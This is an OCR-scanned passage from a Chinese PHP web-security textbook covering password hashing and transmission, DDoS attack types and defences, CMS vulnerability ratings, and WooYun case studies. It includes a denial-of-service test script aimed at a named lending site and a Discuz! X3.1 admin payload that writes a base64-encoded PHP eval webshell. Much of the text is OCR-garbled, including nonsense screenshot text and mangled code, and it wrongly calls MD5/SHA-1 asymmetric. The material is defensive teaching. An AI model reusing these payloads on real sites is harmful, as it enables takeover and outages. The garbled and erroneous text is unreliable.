了 暴力 破解 的 时 间 。 如 果 遇 到 简单 的 密码 ， 通 过 常用 密码 字典 的 暴力 破解 法 很 快 就 可 以 还 原 
密码 原文 。 


(3 ) 密码 + 随机 数 哈 希 

这 种 加 密 算法 是 加 入 了 随机 salt 的 哈 希 算法 ， 密 码 原文 (或 进 过 hash 后 的 值 )》 和 随机 生 
成 的 salt 字 符 串 混淆 ， 然 后 进行 hash， 最 后 把 hash 值 和 salt 值 一 起 存储 。 验 证 密码 的 时 候 ， 只 
要 用 存储 的 salt 值 再 做 一 次 相同 的 hash， 再 与 存储 的 hash 值 比较 就 可 以 了 。 

这 样 一 来 ， 就 算 用 户 使 用 简单 的 密码 ， 但 经 过 salt 混 淆 过 的 字符 串 就 是 一 个 很 不 常见 的 
串 ， 一 般 不 会 出 现在 密码 常用 字典 中 。salt 的 长 度 越 长 ， 暴 力 破解 的 难度 就 越 大 。 有 具体 的 hash 
过 程 也 可 以 进行 若干 次 迭代 , 虽然 hash 和 迭 代 会 增加 碰撞 率 , 但 也 增加 了 暴力 破解 的 资源 消耗 。 
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如 果 密 码 真 被 攻击 者 暴力 破解 了 ， 被 破解 的 也 只 是 这 个 随机 salt 混 淆 过 的 密码 ， 攻 击 者 
不 能 用 它 来 登录 该 用 户 的 其 他 应 用 ， 因 为 不 同 的 用 户 使 用 的 是 不 同 的 salt。 

上 面 这 几 种 方法 都 不 可 能 还 原 密码 的 明文 ， 这 意味 着 即使 是 开发 者 也 不 知道 密码 原文 。 
因此 ， 网 站 也 没有 办 法 提醒 用 户 原来 的 密码 是 什么 。 如 果 用 户 忘 了 自己 的 密码 ， 可 以 提供 一 
个 重 置 密码 的 功能 ， 帮 用 户 随 机 生成 一 个 临时 密码 ， 让 用 户 通过 这 个 临时 密码 来 登录 系统 ， 
重新 设置 新 的 密码 。 


5.3.2 ”密码 传输 
在 Web 系 统 登录 认证 中 ， 用 户 输入 的 密码 传输 要 经 过 以 下 步骤 : 
4 用户 在 网 络 浏览 器 上 输入 原始 密码 : 人 一 键盘 ~ 浏览 器 内 存 。 


9 原始 密码 做 一 定 的 转换 : 内 存 中 的 原始 密码 内存 中 的 转换 后 的 密码 。 
8 转换 后 的 密码 在 线 上 传输 : 内 存 中 转换 后 的 密码 一 网 络 一 服务 器 。 


这 其 中 的 每 一 步 都 有 可 能 导致 原始 密码 泄露 ， 当 然 防范 也 有 相应 的 应 对 之 法 。 

原始 密码 会 经 过 一 些 转 换 才 能 在 线 上 传输 , 这 跟 密 码 的 存储 类 似 , 直接 传输 明文 密码 肯 
定 是 最 不 安全 的 。 而 用 简单 的 可 逆 变 换 或 者 固定 密 钥 加 密 也 只 是 增加 了 破解 难度 。 最 好 是 每 
次 Server 随 机 产生 一 个 密 钥 ， 送 给 Client 端 进行 密码 加 密 。 

如 果 使 用 HTTPS， 则 所 有 通过 SSL 通 道 的 信息 都 是 经 过 随机 密 钥 加 密 的 ， 自 然 也 包括 密 
码 。 当 然 ， 使 用 HTTPS 最 大 的 问题 是 证 书 费用 。 一 个 基础 的 证 书 一 年 也 需要 500 人 民 币 (也 
有 免费 的 )， 一 般 金融 在 线 系统 肯定 要 使 用 HTTPS。 而 大 部 分 在 线 应 用 ， 出 于 价格 以 及 其 他 
考虑 ， 会 选择 在 HTTP 层 简单 交换 随机 密码 的 方式 。 

在 Server 端 生成 随机 密 钥 ， 并 发 送 给 客户 端 。 客 户 端 使 用 MD5 或 SHA-1 等 非 对 称 变换 对 
密 钥 进 行 不 可 逆转 换 ， 再 使 用 Server 的 密 钥 加 密 送 到 Server。 现 在 已 经 有 很 多 JavaScript 的 加 
密 库 可 以 在 浏览 器 端 进行 这 样 的 转换 工作 。 


5.3.3 ”漏洞 案例 
1. 密码 明文 存储 案例 
2012 年 6 月 ， 白 帽子 “跑龙套 的 ”提交 漏洞 “ 某 站 明文 保存 用 户 密码 ”。 
缺陷 编号 : wooyun-2012-06816。 


白 帽子 通过 此 系统 的 密码 找 回 功能 , 在 找 回 密码 结果 提示 中 发 现 该 网 站 竟然 将 明文 密码 
发 送 到 用 户 邮箱 。 也 就 是 说 ， 此 系统 使 用 明文 存储 用 户 密码 ， 比 较 讽刺 的 是 ， 此 新 闻 网 站 的 
科技 频道 曾经 还 发 表 过 关于 明文 密码 不 安全 的 文章 。 该 网 站 显示 的 明文 账户 密码 如 图 5-2 
所 示 。 
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中 华 问 www china com 
尊敬 的 
您 的 密码 为 123456 
版 要 所 有 让 
和 入 和 | 完 广 告 | 使 用 说 明 | 关于 中 华 网 | 高 免 条 款 


WWW.WOOYyUuN .or 





图 5-2 网 站 显示 该 账号 的 明文 密码 
建议 在 密码 验证 代码 中 至 少 加 入 MD5 加 密 功能 ， 并 将 现 有 的 用 户 密码 全 部 进行 转换 ， 


以 提高 安全 性 。 


2. 密码 明文 传输 案例 
2013 年 2 月 ， 白 帽子 “小 胖 胖 要 减肥 ”提交 漏洞 “ 某 网 站 HTTP 明文 传送 密码 且 密 码 


保存 方式 设计 缺陷 ” 


题 ， 


缺陷 编号 ，wooyun-2013-020875 。 


发 生 漏洞 的 系统 是 一 家 在 线 订 酒店 的 平台 , 白 帽 子 在 其 平台 登录 时 发 现 登 录 存 在 安全 问 
其 用 户 认 证 使 用 的 是 Ajax， 采 用 的 是 GET 请 求 方式 ， 以 下 是 抓 取 到 的 数据 包 : 
GETAvS/Ajax/A_checkUser.asp?u=139*######4&cp=n#####2&cjsoncallback=jsonp1364522933663 HTTP/1.1 
Host: www.zhuna.cn 

User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 

Accept: text/javascript, application/javascript, */*; q=0.01 

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en:q=0.3 

Accept-Encoding: gzip, deflate 

X-Requested-With: XMLHttpRequest 

Referer: http://www.localhost.cn/ 


此 处 账户 认证 存在 两 处 问题 : 一 个 是 开发 基础 安全 知识 的 问题 ，get 方式 不 能 用 来 传输 


敏感 数据 ， 二 是 密码 传递 最 好 采用 MD5 加 密 且 存 进 数 据 库 加 盐 的 方式 。 


登录 后 还 发 现 另 一 处 比较 严重 的 问题 ， 白 帽子 在 浏览 器 中 发 现 用 户 名 和 密码 竟 存 在 于 


Cookies 中 ， 而 Cookies 关键 字段 没有 HttpOnly， 且 密码 使 用 简单 的 MD5 加 密 ， 如 此 拿 到 


Cookies 就 能 知道 用 户 名 和 密码 ， 这 个 问题 完全 是 架构 设计 上 存在 缺陷 ， 如 图 5-3 所 示 。 


CT 





图 5-3 通过 解密 Cookies 值 获取 用 户 名 和 密码 
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针对 此 案例 ， 为 保护 用 户 和 密码 的 安全 性 ， 以 下 是 两 条 建议 : 
(1) 传输 尽量 使 用 HITPS， 关 键 数据 明文 传输 不 能 使 用 GET， 最 起 码 用 POST。 
(2) 不 要 使 用 Cookies 记录 密码 ， 如 果 一 定 要 使 用 ， 也 得 加 上 HttpOnly。 


5.3.4 总结 


在 本 章 中 大 量 提 到 “ 密 铀 ” “对称 密 钥 加 密 ”“ 非 对 称 密 钥 加 密 ”“ 数 字 签 名 ”“ 数 字 
证 书 ”等 关键 词 ， 并 有 附 有 详细 说 明 ， 但 读者 可 能 并 不 容易 记 住 ， 因 此 下 面 对 这 些 术语 做 一 
个 总 结 。 

密 钥 : 改变 密码 行为 的 数字 化 参数 。 

对 称 密 钥 加 密 : 加 密 解 密使 用 相同 密 钥 的 算法 。 

非 对 称 密 钥 加 密 : 加 密 解 密使 用 不 同 密 钥 的 算法 。 
数字 签名 : 用 来 验证 报 文 未 被 伪造 或 纂 改 的 校 验 和 。 
数字 证 书 : 由 一 个 可 信 的 组 织 验 证 和 签发 的 识别 信息 。 

在 密码 存储 设计 时 ， 只 需 保 存 有 损 的 密码 信息 。 可 以 通过 单 向 的 hash 和 salt 来 保证 密码 
明文 只 存在 于 用 户 手中 ， 而 不 能 保存 可 还 原 密码 原文 的 信息 。 若 因 种 种 原因 一 定 要 可 还 原 密 
码 原文 ， 则 使 用 非 对 称 加密 ， 并 保管 好 私 钥 。 


2 多 
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Web 安 全 是 一 个 综合 型 体系 ， 在 前 面 的 章节 中 介绍 了 防止 信息 泄露 、 安 全 编码 、 业 务 安 
全 设计 、 配 置 安全 等 ， 在 本 章 中 讲解 一 些 Web 安 全 相关 的 话题 ， 比 如 DDOS 的 攻击 原理 ， 开 
发 者 如 何 应 对 使 用 开源 的 CMS 系统 风险 ， 漏 洞 评 级 与 防护 ， 针 对 网 页 挂 马 如 何 处 理 。 另 外 ， 
本 章 最 后 还 将 介绍 两 款 安全 检测 工具 。 

安全 工具 对 于 攻击 者 来 说 是 必 不 可 少 的 辅助 工具 , 对 于 开发 者 来 说 同样 也 非常 重要 。 开 
发 者 可 通过 安全 工具 来 检验 自身 开发 的 产品 的 安全 性 如 何 , 也 可 以 通过 安全 工具 学 习 更 多 安 
全 知识 。 本 章 将 介绍 的 两 款 安 全 工具 分 别 是 Web 安 全 扫描 套件 BurpSuite 与 SQL 注入 神器 
SQLMap， 和 希望 通过 这 两 款 工具 能 让 读者 对 Web 安 全 工具 有 一 些 了 解 。 








6.1 DDoS 攻击 


当 你 的 业务 规模 越 大 时 , 就 有 可 能 会 经 常 遇 到 DDoS 攻 击 , DDoS 攻击 是 攻击 者 通过 控制 
一 批 肉鸡 来 请 求 服务 器 的 资源 ， 最 终 资源 被 耗 尽 所 导致 的 一 种 漏洞 。 DDoS 也 有 好 几 种 类 型 ， 
不 同 的 类 型 防御 方案 并 不 一 致 ， 本 节 将 详细 介绍 DDoS 的 原理 及 应 对 方案 。 

DDoS 通常 由 两 端 来 协同 攻击 ， 分 为 主 控 端 与 肉鸡 端 。 主 控 端 是 攻击 者 通过 此 程序 发 布 
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攻击 命令 所 使 用 的 ， 肉 鸡 端 则 是 实际 发 起 攻击 的 程序 , 通常 肉鸡 端 是 在 用 户 不 知情 的 情况 下 
被 攻击 者 所 安装 的 。 攻 击 者 通常 将 DDoS 主 控 端 安装 在 自己 可 控 的 计算 机 上 ， 在 需要 发 起 攻 
击 时 则 上 线 ， 此 时 将 会 与 大 量 肉 鸡 保持 连接 ， 当 主 控 端 发 起 攻击 命令 时 ， 肉 鸡 端 收 到 指令 时 
就 发 动 攻击 。 

被 攻击 的 计算 机 称 为 受害 主机 , 受害 主机 在 短 时 间 内 会 收 到 大 量 肉鸡 的 请 求 , 当 受 害 主 
机 的 资源 不 够 时 ， 便 会 进入 瘫痪 状态 。 比 如 受害 主机 的 带宽 只 有 10M， 但 是 大 量 肉 鸡 发 起 的 
请 求 已 经 有 1G， 此 时 受害 主机 的 网 络 会 被 完全 堵塞 ， 无 法 接收 来 自 正常 用 户 的 请 求 。 


6.1.1 DDoS 分 类 


DDoS 的 攻击 软件 与 手法 非常 多 ， 但 从 DDoS 的 特征 来 分 类 ， 只 有 3 种 类 型 ， 分 别 是 
SYN/ACK Flood 攻 击 、TCP 全 连接 攻击 和 刷 Script 脚本 攻击 。 


1. SYN/ACK Flood 攻击 


SYN/ACK Flood 攻 击 是 指 肉鸡 端 通过 向 受害 主机 发 送 大 量 伪造 源 IP 和 源 端口 的 SYN 或 
ACK 包 ,导致 主机 的 缓存 资源 被 耗 尽 或 忙于 发 送 回应 包 而 造成 拒绝 服务 , 由 于 源 都 是 伪造 的 ， 
因此 要 想 追 踪 肉 鸡 的 了 比较 困难 。 

如 果 是 少量 的 SYN/ACK Flood 攻 击 ， 会 导致 主机 服务 器 无 法 访问 ， 但 可 以 Ping 通 ， 在 服 
务 器 上 用 Netstat -na 命令 会 观察 到 存在 大 量 SYN_RECEIVED 状 态 ; 大 量 的 这 种 攻击 则 会 导致 
Ping 失 败 、TCP/PP 栈 失效 ， 并 会 出 现 系统 凝固 现象 ， 即 键盘 和 鼠标 不 响应 ， 普 通 防火 墙 大 多 
无 法 抵御 这 种 攻击 。 

2.TCP 全 连接 攻击 


TCP 全 连接 攻击 是 指 通过 许多 肉鸡 端 不 断 地 与 受害 主机 建立 大 量 TCP 连 接 ， 直 到 受害 主 
机 的 内 存 等 资源 耗 尽 而 被 拖 垮 ， 从 而 造成 拒绝 服务 。 

这 种 攻击 是 为 了 绕 过 常规 防火 墙 的 检查 而 设计 的 。 一 般 情 况 下 , 常规 防火 墙 大 多 具备 过 
滤 TearDrop、Land 等 DDoS 攻 击 的 能 力 , 但 对 于 正常 的 TCP 连 接 是 放 过 的 , 而 Web 服 务 器 能 接 
受 的 TCP 连 接 数 是 有 限 的， 一 旦 有 大 量 TCP 连 接 ， 即 便 是 正常 的 ， 也 会 导致 网 站 访问 非常 组 
慢 甚 至 无 法 访问 。 

这 种 攻击 的 特点 是 可 绕 过 一 般 防火 墙 的 防护 而 达到 攻击 目的 , 但 攻击 者 需要 找 很 多 肉鸡 
端 并 且 由 于 肉鸡 端的 人 P 是 直接 暴露 的 ， 因 此 容易 被 追踪 。 可 以 将 此 I 人 P 列 为 黑 名 单 ，IP 访 问 
服务 器 在 路 由 层 便 将 其 拦截 下 来 ， 使 之 不 再 占用 服务 器 资源 。 
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3. 刷 Script 脚本 攻击 


脚本 攻击 主要 针对 存在 ASP、JSP、PHP、CGI 等 Web 程 序 ， 并 调用 MySQL、Oracle 等 数 
据 库 的 网 站 系统 而 设计 的 ,特征 是 和 服务 器 建立 正常 的 TCP 连 接 ， 并 不 断 地 向 脚本 程序 提交 
查询 、 列 表 等 大 量 耗费 数据 库 资源 的 调用 。 一 般 来 说 ， 提 交 一 个 GET 或 POST 指令 对 客户 端 
的 耗费 和 带宽 的 占用 几乎 是 可 以 忽略 的 , 而 服务 器 为 处 理 此 请 求 却 可 能 要 从 上 万 条 记录 中 查 
出 某 条 记录 ,这 种 处 理 过 程 对 资源 的 耗费 是 很 大 的 , 常见 的 数据 库 服务 器 很 少 支持 数 百 个 查 
询 指令 同时 执行 ， 而 这 对 于 客户 端 来 说 却 是 轻而易举 的 。 

因此 ， 攻 击 者 只 需 通 过 Proxy 代 理 向 主机 服务 器 大 量 递交 查询 指令 ， 经 过 数 分 钟 就 会 把 
服务 器 资源 消耗 掉 而 导致 拒绝 服务 ， 常 见 的 现象 是 用 户 访问 网 站 非常 慢 、PHP 连 接 数 据 库 失 
败 、 数 据 库 主 程序 占用 CPU 偏 高 。 这 种 攻击 的 特点 是 可 以 完全 绕 过 普通 的 防火 墙 防护 ， 轻 松 
找 一 些 Proxy 代 理 就 可 以 实施 攻击 ， 但 对 付 只 有 静态 页 面 的 网 站 效果 会 大 打折 扣 ， 并 且 有 些 
Proxy 会 暴露 攻击 者 的 也 地 址 。 


6.1.2 ”应 对 方案 


DDoS 的 防范 需要 多 个 维度 的 处 理 , 仅 依 靠 某 种 系统 或 产品 防 住 DDoS 是 不 现实 的 , 完全 
杜绝 DDoS 也 是 不 可 能 的 ， 但 通过 适当 的 措施 抵御 90% 的 DDoS 攻击 可 以 做 到 。 基 于 攻击 和 防 
御 都 有 成 本 开销 的 缘故 ， 若 通过 适当 的 办 法 增强 了 抵御 DDoS 的 能 力 ， 也 就 意味 着 加 大 了 攻 
击 者 的 攻击 成 本 ， 那 么 绝 大 多 数 攻击 者 将 因 无 法 继续 下 去 而 放弃 ， 也 就 相当 于 成 功 地 抵御 了 
DDoS 攻击 。 

目前 ， 很 多 公司 把 业务 系统 放 在 云 服务 器 上 ， 是 否 不 用 担心 DDoS 了 呢 ? 实际 上 ， 云 服 
务 器 只 是 方便 升级 硬件 和 网 络 设备 ， 而 对 于 服务 器 的 设备 升级 仍然 是 我 们 需要 考虑 的 问题 。 
下 面 是 假设 服务 器 在 本 地 部 署 时 ， 防 范 DDoS 攻 击 的 参考 措施 。 


1. 采用 高 性 能 的 网 络 设备 


首先 要 保证 网 络 设备 不 能 成 为 瓶颈 ， 因 此 选择 路 由 器 、 交 换 机 、 硬 件 防火 墙 等 设备 的 时 
候 要 尽量 选用 知名 度 高 、 口 碑 好 的 产品 。 再 就 是 ， 和 网 络 提供 商 有 特殊 关系 或 协议 就 更 好 了 ， 
当 大 量 攻击 发 生 的 时 候 ， 请 他 们 在 网 络 接点 处 进行 流量 限制 来 对 抗 某 些 种 类 的 DDoS 攻击 是 
非常 有 效 的 。 


2. 尽量 避免 NAT 的 使 用 


无 论 是 路 由 器 还 是 硬件 防护 墙 设备 ,要 尽量 避免 采用 网 络 地 址 转换 NAT 的 使 用 , 因为 采 
用 此 技术 会 较 大 地 降低 网 络 通信 能 力 ， 其 实 原因 很 简单 ， 因 为 NAT 需 要 对 地 址 来 回转 换 ， 转 

















183 


PHP Web 安全 开发 实战 


换 过 程 中 需要 对 网 络 包 进 行 校 验 和 计算 ， 因 此 浪费 了 很 多 CPU 的 时 间 ,， 但 有 些 时 候 必须 使 用 
NAT， 那 就 没有 好 办 法 了 。 


3. 充足 的 网 络 带宽 保证 


网 络 带宽 直接 决定 了 能 抗 受 攻击 的 能 力 ， 假 若 仅仅 有 10MB 带 宽 ， 无 论 采取 什么 措施 都 
很 难 对 抗 SYNFlood 攻 击 ， 至 少 要 选择 100MB 的 共享 带宽 ， 最 好 是 挂 在 1000MB 的 主干 上 。 但 
需要 注意 的 是 ， 主 机 上 的 网 卡 是 1000MB 的 并 不 意味 着 它 的 网 络 带宽 就 是 千 光 的， 若 把 它 接 
在 100MB 的 交换 机 上 , 它 的 实际 带宽 不 会 超过 100MB， 再 就 是 ， 接 在 100MB 的 带宽 上 也 不 等 
于 就 有 了 百 兆 的 带宽 ， 因 为 网 络 服务 商 很 可 能 会 在 交换 机 上 限制 实际 带宽 为 0OMB， 这 点 一 
定 要 搞 清楚 。 

4. 黑洞 引导 


黑洞 引导 指 将 所 有 受 攻击 计算 机 的 通信 全 部 发 送 至 一 个 “黑洞 ”( 空 接口 或 不 存在 的 计 
算 机 地 址 ) 或 者 有 足够 能 力 处 理 洪流 的 网 络 设备 商 ， 以 避免 网 络 受到 较 大 影响 。 


5. 防火 墙 


防火 墙 可 以 设置 规则 ， 例 如 允许 或 拒绝 特定 通信 协议 、 端 口 或 PP 地址 。 当 攻击 从 少数 不 
正常 的 耳 地 址 发 出 时 ， 可 以 简单 地 使 用 拒绝 规则 阻止 一 切 从 攻击 源 卫 发 出 的 通信 。 

复杂 攻击 难以 用 简单 规则 来 阻止 , 例如 80 端 口 ( 网 页 服务 ) 遭受 攻击 时 ， 不 可 能 拒绝 端 
口 所 有 的 通信 , 因为 其 同时 会 阻止 合法 流量 。 此 外 , 防火 墙 可 能 处 于 网 络 架构 中 过 后 的 位 置 ， 
路 由 器 可 能 在 恶意 流量 达到 防火 墙 前 即 被 攻击 影响 。 


6.1.3 ”漏洞 案例 


2013 年 2 月 , 白 帽 子 “ 欧 阳 头 条 ”提交 漏洞 “P2P 平台 计算 还 款 信息 时 的 大 运算 DDoS 
攻击 ”。 

缺陷 编号 : wooyun-2013-023801 。 

此 系统 是 一 个 P2P 平台 ， 白 帽子 发 现在 计算 还 款 信息 时 的 位 置 可 能 存在 DDoS 攻击 ， 
单个 请 求 就 可 以 使 服务 器 拒绝 服务 ，URL 地 址 : http://www.localhost.com/calculate.action? 
amount=120000&apr=11&repayTime=12000000&show=true&type=DEBX&manageFeeShow= 
true，URL 中 的 repayTime 是 分 期 数 ， 而 Java 中 的 BigDecimal 大 运算 可 以 导致 CPU100% 不 
再 提供 服务 ， 在 该 功能 前 人 台 校 验 了 最 大 值 为 120， 不 过 后 全 却 没有 校 验 。 

白 帽 子 写 了 一 个 测试 脚本 ， 代 码 如 图 6-1 所 示 ， 遍 历 向 服务 器 请 求 计算 还 款 信息 。 
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1 #coding:utf-8 
2 import urllib2, socket 

3 url = ‘http://wm.renrendai. com/calculate.action?anount=1200608apr=11érepoyTime=-120000008show=trueBtype=DEBX&nonogeFees 
4 headers_P = {"Cooki ishare firstime=1365493987221; womail.=dono yE163. com; jforumUserInfordomo y:268221:nutl; IS_NOB 
5 “User-Agent": "Nozilla/5,0 (Windows NT 6,1; MOM54; ry:20.8) Gecho/20100101 Firefox/20.0"} 
6 
8 





req = urllib2.Request(url, headers=headers_p) 
for 1 in range(4): 


try: 
19 urllib2.urlopen(req, timeout=15) 
11 WB = "daosattack Fotti 


六 + str(err) 





+ str(err) 
16 except Exception as err: 

人 s+ str(err) 
18 finally: 
19 print 





- | 











Success:timed out 


图 6-1 测试 脚本 代码 


不 久 后 服务 器 便 出 现 了 返回 超时 情况 ， 如 图 6-2 所 示 ， 官 方 网 站 已 经 不 能 打开 ， 这 便 是 
一 DDoS 案例 。 


文件 坊 强 日 二 FEG 书签 8) 工具 (帮助 (H) 
贡 g@ 沪 站 人 人 全 





€ Bwrenrendaicom 
园 访问 最 多 | 火 狼 志方 站 点 [] 新手 上 器 | 小 第 用 网 址 


renrendal.com 


人 OO 人 人 贷 次 服 电话 : 400-027-8080 


对 不 起 ， 你 访问 的 网 页 暂时 无 法 打开 ， 你 可 以 稍 后 尝试 重新 打开 。 











图 6-2 网 站 出 现 超时 


不 过 服务 器 过 了 几 分 钟 后 再 次 恢复 正常 ,所 以 白 帽 子 推测 服务 器 应 该 是 有 类 似 supervise 
的 重启 机 制 。 


185 


PHP Web 安全 开发 实战 


6.1.4 小 结 


总 体 来 说 ，DDoS 攻 击 的 最 大 特点 是 多 台 计 算 机 对 一 台 计算 机 发 起 流量 攻击 ， 而 受害 主 
机 因为 资源 不 够 或 者 设计 不 当 便 造成 无 法 访问 。 所 以 对 于 DDoS 攻击 的 防范 ， 可 重点 从 下 面 
几 个 方面 考虑 。 

人 从 应 用 层 来 说 ， 尽 可 能 更 新 系统 安全 补丁 来 降低 漏洞 利用 风险 。 

9 采取 合适 的 安全 域 划分 ， 配 置 防火 墙 、 入 侵 检 测 和 防范 系统 ， 减 缓 攻击 。 

@ 采用 分 布 式 组 网 、 负 载 均衡 、 提 升 系统 容量 等 可 靠 性 措施 增强 总 体 服务 能 力 。 





大 部 分 PHP 开 发 者 都 听 过 Dedecms、Discuz、WordPress 等 CMS 开源 系统 ， 有 不 少 用 
WordPress 来 搭建 博客 程序 ， 也 有 很 多 软件 公司 用 Dedecms 或 phpcms 给 客户 搭建 网 站 ， 这 些 
开源 系统 在 开发 效率 上 是 非常 高 的 , 比如 笔者 了 解 到 的 外 包公 司 使 用 dedecms 在 5 天 内 就 可 以 
轻易 搭建 企业 站 点 。 

开源 系统 在 方便 开发 者 快速 开发 的 同时 也 带 来 了 新 的 安全 问题 ， 比 如 开发 者 使 用 的 
CMS 系统 本 身 存在 安全 漏洞 ， 那 么 在 网 站 做 好 之 后 也 同样 存在 此 漏洞 。 


6.2.1 漏洞 简介 


通用 漏洞 是 指 程序 A 出 现 了 安全 漏洞 ， 网 站 B、 网 站 C 都 会 出 现 此 问题 ， 以 Dedecms 即 开 
源 的 CMS 系统 所 搭建 的 站 点 为 例 ， 当 Dedecms 存 在 安全 问题 时 ， 所 有 使 用 Dedecms 搭 建 的 网 
站 都 会 受到 影响 ， 而 此 安全 问题 称 为 CMS 通用 漏洞 。 

由 于 CMS 系统 在 网 络 空间 中 占 比 越 来 越 大 ， 只 要 发 现 其 中 一 个 安全 问题 ， 便 有 成 百 上 
千 台 服务 器 会 受到 影响 , 于 是 不 少 攻击 者 便 把 挖掘 漏洞 的 重点 放 在 CMS 通用 漏洞 挖掘 上 。 同 
时 ， 由 于 CMS 类 型 网 站 整体 修复 周期 很 长 ， 很 容易 被 反复 入 侵 。 如 表 6-1 所 示 是 一 些 常见 的 
CMS 系 统 。 

CMS 系统 非常 多 ， 有 些 CMS 系 统 使 用 的 网 站 特别 多 ， 这 里 我 们 称 之 为 “流行 厂商 ”， 
如 dedecms 市 场 占 比 就 非常 大 ; 而 有 些 CMS 系 统 使 用 的 人 相对 较 少 , 这 里 称 之 为 “一 般 厂商 ”。 
常见 的 CMS 系统 如 表 6-1 所 示 。 
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表 6-1 常见 的 CMS 系统 






























































流行 程度 应 用 名 官方 网 站 地 址 

流行 厂商 DedeCMS http://www.dedecms.com 
流行 厂商 Wordpress https://wordpress.org 

流行 厂商 Discuz http://www.discuz.net 

流行 厂商 ECShop http://yunqi.shopex.cn/products/ecshop 
流行 厂商 phpcms http://www.phpcms.cn/v9/ 

一 般 厂商 I empirecms http://www.phome.net/ecms72/ 
- 般 厂商 I aspcms http://www.asp4cms.com 

- 般 厂商 I MetInfo https://www.metinfo.cn 

- 般 厂商 I Z-Blog https://github.com/zblogen/zblogphp 
- 般 厂商 I Destoon http://www.destoon.com 

- 般 厂商 II KesionCMS http://www.kesion.com/aspb/ 
- 般 厂 商 开 微 擎 http://www.we7.cc/ 

- 般 厂 商 开 thinkphp http://www.thinkphp.cn/ 

- 般 厂 商 开 Phpwind http://www.phpwind.net 

- 般 厂商 开 Shopex http://yunqi.shopex.cn/ 

- 般 厂 商 开 艺 帆 cms http://www.i5808.com 

- 般 厂商 开 Joomla https://www.joomla.org 

- 般 厂 商 开 Drupal https://www.drupal.org 

- 般 厂 商 全 Emlog http://www.emlog.net/ 

- 般 厂 商 芽 齐 博 CMS http://www.qibosoft.com 

- 般 厂 商 钙 ESPCMS http://www.ecisp.cn 

- 般 厂商 三 Cmseasy http://www.cmseasy.cn 

- 般 厂商 了 H 74cms http://www.74cms.com 

- 般 厂商 芽 Finecms http://www.finecms.net/ 


6.2.2 ”等 级 划分 





目前 很 多 漏洞 报告 平台 会 针对 安全 人 员 发 现 的 通用 漏洞 上 报 行为 提供 一 些 奖励 , 奖励 金 
额 通常 会 按照 漏洞 的 危害 性 来 决定 ， 有 三 个 等 级 : 高 危 、 中 危 、 低 危 。 
对 于 开发 者 来 说 , 或 许 不 会 通过 此 漏洞 等 级 来 获得 奖励 ,不 过 开发 者 可 以 通过 此 漏洞 等 








级 在 脑海 里 形成 一 些 安全 等 级 观念 ， 从 而 在 





要 位 置 加 强 防范 。 
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1. 高 危 漏洞 


攻击 者 能 通过 此 漏洞 直接 获取 系统 权限 , 包括 远程 命令 执行 、 代 码 执行 、 上 传 WebShell、 
缓冲 区 溢出 。 严 重 的 逻辑 设计 缺陷 和 流程 缺陷 , 包括 但 不 限于 任意 账号 密码 修改 等 ， 可 直接 
获取 系统 核心 数据 的 漏洞 ， 包 括 但 不 限于 SQL 注入 漏洞 ， 严 重 的 权限 绕 过 类 漏洞 ， 包 括 但 不 
限于 绕 过 认证 直接 访问 管理 后 台 、Cookie 欺 骗 等 漏洞 。 


2. 中 危 漏 洞 


中 和 危 漏 洞 是 指 攻击 者 在 受 限 条 件 下 可 以 获取 服务 器 权限 或 网 站 权限 与 核心 数据 库 数 据 
的 操作 , 包括 但 不 限于 交互 性 代码 执行 、 一 定 条 件 下 的 注入 、 特定 系统 版 本 下 的 getshell 等 。 
无 限制 任意 文件 操作 漏洞 包括 但 不 限于 任意 文件 写 、 删 除 、 下 载 ， 敏 感 文件 读 取 等 操作 。 普 
通 越权 访问 包括 但 不 限于 绕 过 限制 修改 用 户 资料 、 执 行 用 户 操作 。 


3. 低 危 漏 洞 


除 流行 厂商 外 ， 所 有 范围 的 后 台 漏 洞 均 称 为 “ 低 危 漏洞 ”。 
除 流行 厂商 外 的 XSS 漏洞 均 称 为 “ 低 危 漏洞 ”。 
官方 初始 测试 数据 导致 的 安全 问题 ， 比 如 后 台 默 认 的 账号 .密码 分 别 为 admin 和 admin。 
在 条 件 严 苛 的 环境 下 ， 攻 击 者 能 够 获取 核心 数据 或 者 控制 核心 业务 的 操作 。 
攻击 者 能 够 获取 一 些 数据 ， 但 不 属于 核心 数据 的 操作 。 
6.2.3 ”漏洞 案例 

1. 命令 执行 漏洞 案例 

Discuz! 是 一 个 开源 的 PHP 论 坛 程序 ， 目 前 在 国内 论坛 网 站 中 被 大 量 使 用 ,如 国内 较 大 的 
miui 论 坛 也 是 使 用 Discuz 所 改造 的 。 使 用 Discuz 的 人 多 了 ,攻击 者 也 会 增多 ,因此 Discuz 被 发 
现 的 漏洞 也 不 少见 ， 以 “Discuz! 3.1 后 台 命 令 执行 ”漏洞 为 例 ， 可 以 看 出 ， 当 Discuz 漏 洞 被 
发 现 后 ， 有 多 少 网 站 会 受到 影响 。 

(1) 插入 测试 代码 

下 面 是 “Discuz! 3.1 后 台 命 令 执行 ”漏洞 复 现 过 程 ， 在 “Discuz! X3.1 Release 20131122” 
版 本 中 存在 此 漏洞 ， 在 Discuz 后 台中 ， 打 开 全 局 一 站 点 信息 : 网 站 第 三 方 统 计 代码 ， 在 文本 
输入 框 中 填写 如 下 代码 : 

<2php 

fputs(fopen('m.php', w),base64 decode("PD9waHAgQGV2Y WwoJF9QTINUW2NdKTs/Pg=—=")); 

填写 测试 代码 ， 如 图 6-3 所 示 。 














SH HS 多 
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Discuz! 二 国志 内容 用 户 门户 论坛 群 组 防 汪 未 去 会 下 用 工具 范 长 UCenter 

onolPanel [RE 

is: 

Emerzme 司 站 名 页 , 按时 
RURL 

eVwwwaomserzeam 1 EE 
和 

Bnesrncom 


QQ 本 二 各 




















[ 32382000EeE 


网 洁 各 要 全 县 代 到 : 


[ 
加 不 相 机 全 县 汪 : 
回 是 口 再 a 


网 店堂 = 方 枝 计 代 罗 : 




















图 6-3 填写 测试 代码 





确认 代码 无 误 之 后 ， 单 击 表单 下 方 的 “提交 ”按钮 。 


(2 ) 设置 缓存 目录 
选择 门户 ~~HTML 管 理 一 设置 ， 设 置 专题 HTML 的 存放 目录 为 source/include/cron， 如 图 
6-4 所 示 。 


NPp>Hmse fs 
html 生成 全 第 生成 首页 半天 绒 尖 “生成 文章 生成 * 息 医 E3 
HTML: 
@ OQ 
各 文件 扩 攻 各 : 
Few 
文 空 HTML 存 攻 各 目录: 
Eee SE 
目录 由: 


[B52 画 
二 本 HTWt 全 名目 了 
PT 
门 P 音 机 人 夫 训 天 名 
ex 


EE= 


